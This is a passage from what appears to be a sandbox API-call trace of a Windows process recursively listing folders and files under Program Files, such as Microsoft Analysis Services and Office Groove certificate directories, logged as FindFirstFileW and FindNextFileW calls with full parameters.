nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1200 [0038.855] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.855] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0038.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0038.857] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.857] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0038.857] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1240 [0038.860] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.860] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0038.860] FindClose (in: hFindFile=0x3ed1240 | out: hFindFile=0x3ed1240) returned 1 [0038.861] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0038.861] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0038.861] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1240 [0038.861] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.861] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0038.861] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0038.864] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.865] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f68100, ftCreationTime.dwHighDateTime=0x1c9b09b, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd9f68100, ftLastWriteTime.dwHighDateTime=0x1c9b09b, nFileSizeHigh=0x0, nFileSizeLow=0xa2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdsrv.rll", cAlternateFileName="")) returned 1 [0038.865] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0038.865] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37e0fa0 | out: hHeap=0x5f0000) returned 1 [0038.865] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0038.865] FindClose (in: hFindFile=0x3ed1240 | out: hFindFile=0x3ed1240) returned 1 [0038.865] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0038.865] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0038.865] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0038.865] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ee2070 | out: hHeap=0x5f0000) returned 1 [0038.865] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 0 [0038.865] FindClose (in: hFindFile=0x3ed1200 | out: hFindFile=0x3ed1200) returned 1 [0038.865] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ec0058 | out: hHeap=0x5f0000) returned 1 [0038.865] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7bc69f0, ftCreationTime.dwHighDateTime=0x1d4ca08, ftLastAccessTime.dwLowDateTime=0x49fdf8d0, ftLastAccessTime.dwHighDateTime=0x1d49b5a, ftLastWriteTime.dwLowDateTime=0x49fdf8d0, ftLastWriteTime.dwHighDateTime=0x1d49b5a, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="entrepreneur.exe", cAlternateFileName="ENTREP~1.EXE")) returned 1 [0038.865] FindClose (in: hFindFile=0x3ed11c0 | out: hFindFile=0x3ed11c0) returned 1 [0038.865] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0038.867] FindNextFileW (in: hFindFile=0x3ed1080, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa4156880, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xa4156880, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0038.867] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa4156880, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xa4156880, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed11c0 [0038.868] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa4156880, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xa4156880, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.868] FindNextFileW (in: hFindFile=0x3ed11c0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0038.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\*", lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1200 [0038.869] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.869] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0038.869] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed12c0 [0038.871] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.872] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54952c00, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54952c00, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0042.009] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed12c0 [0042.010] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.010] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 1 [0042.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\*", lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0042.011] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.011] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Components", cAlternateFileName="COMPON~1")) returned 1 [0042.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\*", lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1380 [0042.198] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.198] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcf1000, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcf1000, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignedComponents.cer", cAlternateFileName="SIGNED~1.CER")) returned 1 [0042.198] FindClose (in: hFindFile=0x3ed1380 | out: hFindFile=0x3ed1380) returned 1 [0042.198] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0042.198] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a95a430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0042.198] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\*", lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a95a430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1380 [0042.306] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a95a430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.306] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcf1000, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcf1000, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x290, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignedManagedObjects.cer", cAlternateFileName="SIGNED~1.CER")) returned 1 [0042.307] FindClose (in: hFindFile=0x3ed1380 | out: hFindFile=0x3ed1380) returned 1 [0042.307] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0042.307] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d169470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d169470, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 